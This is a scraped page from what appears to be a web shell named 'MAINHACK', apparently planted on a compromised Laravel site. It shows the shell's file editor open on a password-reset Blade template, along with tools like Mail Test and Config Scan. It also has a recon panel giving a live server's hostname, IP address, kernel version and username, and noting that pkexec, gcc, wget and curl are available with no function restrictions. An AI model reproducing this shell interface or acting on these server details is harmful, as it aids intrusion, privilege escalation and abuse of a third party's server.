[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: reset-password.blade.php
<x-guest-layout> <x-auth-card> @section('page-title') {{ __('Reset Password') }} @endsection @section('content') <div class="card-body"> <div class=""> <h2 class="mb-3 f-w-600">{{ __('Reset Password') }}</h2> </div> <form method="POST" action="{{ route('password.update') }}" class="needs-validation" novalidate> @csrf <input type="hidden" name="token" value="{{ $request->route('token') }}"> <div class=""> <div class="form-group mb-3"> <label for="email" class="form-label">{{ __('Email') }}</label> <input type="email" class="form-control @error('email') is-invalid @enderror" name="email" id="emailaddress" value="{{ old('email') }}" required autocomplete="email" autofocus placeholder="{{ __('Enter Your Email') }}"> @error('email') <span class="invalid-feedback" role="alert"> <strong>{{ $message }}</strong> </span> @enderror </div> <div class="form-group mb-3"> <label for="password" class="form-label">{{ __('Password') }}</label> <input type="password" class="form-control @error('password') is-invalid @enderror" name="password" required autocomplete="new-password" id="password" placeholder="{{ __('Enter Your Password') }}"> @error('password') <span class="invalid-feedback" role="alert"> <strong>{{ $message }}</strong> </span> @enderror </div> <div class="form-group mb-3"> <label for="password" class="form-label">{{ __('Confirm Password') }}</label> <input type="password" class="form-control @error('password_confirmation') is-invalid @enderror" name="password_confirmation" required autocomplete="new-password" id="password_confirmation" placeholder="{{ __('Enter Your Password') }}"> </div> <div class="d-grid"> <button type="submit" id="login_button" class="btn btn-primary btn-block mt-2">{{ __('Reset Password') }}</button> </div> </form> </div> {{-- <div class="col-xl-6 img-card-side"> <div class="auth-img-content"> <img src="{{ asset('assets/images/auth/img-auth-3.svg')}}" alt="" class="img-fluid"> <h3 class="text-white mb-4 mt-5">“Attention is the new currency”</h3> <p class="text-white">The more effortless the writing looks, the more effort the writer actually put into the process.</p> </div> </div> --}} @endsection </x-auth-card> </x-guest-layout>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.82 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002